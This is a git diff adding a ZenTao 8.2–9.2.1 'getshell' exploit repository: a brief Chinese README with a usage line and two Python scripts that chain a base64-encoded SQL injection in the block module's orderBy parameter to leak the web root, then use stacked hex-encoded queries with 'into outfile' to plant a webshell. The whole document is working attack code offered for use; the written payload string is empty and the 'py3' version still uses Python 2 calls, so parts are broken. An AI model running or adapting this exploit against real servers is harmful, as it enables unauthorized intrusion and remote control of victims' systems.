diff --git a/zentao-getshell/README.md b/zentao-getshell/README.md
new file mode 100644
index 0000000..4aacbb3
--- /dev/null
+++ b/zentao-getshell/README.md
@@ -0,0 +1,14 @@
+# zentao-getshell 禅道8.2 - 9.2.1前台Getshell
+## Python Usage
+
+`python exp.py http://127.0.0.1:81/ jas502n.php`
+
+
+
+
+
+
+## 来源
+
+https://github.com/jas502n/zentao-getshell
+
diff --git a/zentao-getshell/exp.py b/zentao-getshell/exp.py
new file mode 100644
index 0000000..6f611dd
--- /dev/null
+++ b/zentao-getshell/exp.py
@@ -0,0 +1,94 @@
+#coding=utf-8
+import requests
+import base64
+import re
+import sys
+import os
+import json
+
+
+banner = '''
+ ________ _______ .__ __. .___________. ___ ______
+| / | ____|| \ | | | | / \ / __ \
+`---/ / | |__ | \| | `---| |----` / ^ \ | | | |
+ / / | __| | . ` | | | / /_\ \ | | | |
+ / /----.| |____ | |\ | | | / _____ \ | `--' |
+ /________||_______||__| \__| |__| /__/ \__\ \______/
+
+ v8.2 - 9.2.1 Getshell
+
+ python by jas502n
+
+ usage: python exp.py http://127.0.0.1:81/zentao webshell.php
+
+'''
+print banner
+
+def get_web_dir(url,filename):
+ if url[-1] == '/':
+ url = url[:-1]
+ else:
+ url = url
+
+ payload = '''{"orderBy":"order limit 1,1'","num":"1,1","type":"openedbyme"}'''
+ base64encode_str = base64.b64encode(payload)
+ web_dir = url + "/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case¶m=" + base64encode_str
+ version_url = url + "/zentao/index.php?mode=getconfig"
+ r0 = requests.get(url=version_url)
+ json_str = json.loads(r0.text)
+ print "Cuurent Version= " + json_str['version']
+ print '\n' + web_dir
+
+ headers = {
+ "Referer":"http://127.0.0.1:81/zentao",
+ "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"
+ }
+
+ r= requests.get(url=web_dir, headers=headers)
+ if r.status_code==200 and 'SELECT' in r.content:
+ print '\n'
+ print r.content
+ m = re.compile(r'.*in (.*) on')
+ print
+ www_dir = m.findall(r.content)[0]
+ www_root = www_dir.replace('\\', "//")
+ print www_root
+ m = re.compile(r'(.*)framework',re.DOTALL)
+
+ # print '>>>>WWWROOT INSTALL: ' +
+ get_shell = "select '' into outfile '%s'" % (m.findall(www_root)[0] + 'www//' + filename)
+ print '\n%s\n' % get_shell
+ hex_str = get_shell.encode('hex')
+ payload1 = '''{"orderBy":"order limit 1;SET @SQL=0x%s;PREPARE pord FROM @SQL;EXECUTE pord;-- -","num":"1,1","type":"openedbyme"}''' % hex_str
+ getshell_url = url + "/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case¶m=" + base64.b64encode(payload1)
+ # print "GetShell_URL=\n\n%s" % getshell_url
+
+ headers = {
+ "Referer":"%s/zentao"%url,
+ "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"
+ }
+ r1 = requests.get(url=getshell_url,headers=headers)
+ if r1.status_code == 200 and 'ID' in r1.content:
+ print getshell_url
+
+ webshell = url + "/zentao/" + filename
+ r2 = requests.get(url=webshell)
+ if r2.status_code == 200:
+ print "\n\n>>>>Webshell: \n%s" % webshell
+ else:
+ print "No Webshell Exit!"
+ else:
+ print "No Send Success into file!"
+
+
+ else:
+ print "No Exit!"
+
+
+
+
+if __name__ == "__main__":
+ # url = "http://127.0.0.1:81/"
+ url = sys.argv[1]
+ filename = sys.argv[2]
+ get_web_dir(url,filename)
\ No newline at end of file
diff --git a/zentao-getshell/exp_py3.py b/zentao-getshell/exp_py3.py
new file mode 100644
index 0000000..e4ff0c4
--- /dev/null
+++ b/zentao-getshell/exp_py3.py
@@ -0,0 +1,97 @@
+# coding=utf-8
+import requests
+import base64
+import re
+import sys
+import os
+import json
+
+banner = '''
+ ________ _______ .__ __. .___________. ___ ______
+| / | ____|| \ | | | | / \ / __ \
+`---/ / | |__ | \| | `---| |----` / ^ \ | | | |
+ / / | __| | . ` | | | / /_\ \ | | | |
+ / /----.| |____ | |\ | | | / _____ \ | `--' |
+ /________||_______||__| \__| |__| /__/ \__\ \______/
+
+ v8.2 - 9.2.1 Getshell
+
+ python by jas502n
+
+ usage: python exp.py http://127.0.0.1:81/zentao webshell.php
+
+'''
+print(banner)
+
+
+def get_web_dir(url, filename):
+ if url[-1] == '/':
+ url = url[:-1]
+ else:
+ url = url
+
+ payload = '''{"orderBy":"order limit 1,1'","num":"1,1","type":"openedbyme"}'''
+ base64encode_str = base64.b64encode(payload)
+ web_dir = url + "/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case¶m=" + base64encode_str
+ version_url = url + "/zentao/index.php?mode=getconfig"
+ r0 = requests.get(url=version_url)
+ json_str = json.loads(r0.text)
+ print("Cuurent Version= " + json_str['version'])
+ print('\n' + web_dir)
+
+ headers = {
+ "Referer":
+ "http://127.0.0.1:81/zentao",
+ "User-Agent":
+ "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"
+ }
+
+ r = requests.get(url=web_dir, headers=headers)
+ if r.status_code == 200 and 'SELECT' in r.content:
+ print('\n')
+ print(r.content)
+ m = re.compile(r'.*in (.*) on')
+ print()
+ www_dir = m.findall(r.content)[0]
+ www_root = www_dir.replace('\\', "//")
+ print(www_root)
+ m = re.compile(r'(.*)framework', re.DOTALL)
+
+ # print '>>>>WWWROOT INSTALL: ' +
+ get_shell = "select '' into outfile '%s'" % (
+ m.findall(www_root)[0] + 'www//' + filename)
+ print('\n%s\n' % get_shell)
+ hex_str = get_shell.encode('hex')
+ payload1 = '''{"orderBy":"order limit 1;SET @SQL=0x%s;PREPARE pord FROM @SQL;EXECUTE pord;-- -","num":"1,1","type":"openedbyme"}''' % hex_str
+ getshell_url = url + "/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case¶m=" + base64.b64encode(
+ payload1)
+ # print "GetShell_URL=\n\n%s" % getshell_url
+
+ headers = {
+ "Referer":
+ "%s/zentao" % url,
+ "User-Agent":
+ "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"
+ }
+ r1 = requests.get(url=getshell_url, headers=headers)
+ if r1.status_code == 200 and 'ID' in r1.content:
+ print(getshell_url)
+
+ webshell = url + "/zentao/" + filename
+ r2 = requests.get(url=webshell)
+ if r2.status_code == 200:
+ print("\n\n>>>>Webshell: \n%s" % webshell)
+ else:
+ print("No Webshell Exit!")
+ else:
+ print("No Send Success into file!")
+
+ else:
+ print("No Exit!")
+
+
+if __name__ == "__main__":
+ # url = "http://127.0.0.1:81/"
+ url = sys.argv[1]
+ filename = sys.argv[2]
+ get_web_dir(url, filename)
diff --git a/zentao-getshell/zentao.gif b/zentao-getshell/zentao.gif
new file mode 100644
index 0000000..a89908c
Binary files /dev/null and b/zentao-getshell/zentao.gif differ
diff --git a/zentao-getshell/zentao.jpg b/zentao-getshell/zentao.jpg
new file mode 100644
index 0000000..af0fdc4
Binary files /dev/null and b/zentao-getshell/zentao.jpg differ